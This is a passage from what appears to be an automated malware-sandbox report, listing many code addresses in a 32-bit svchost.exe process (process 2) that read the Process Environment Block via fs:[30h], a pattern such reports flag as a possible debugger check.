                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h] 2_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h] 2_2_031062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
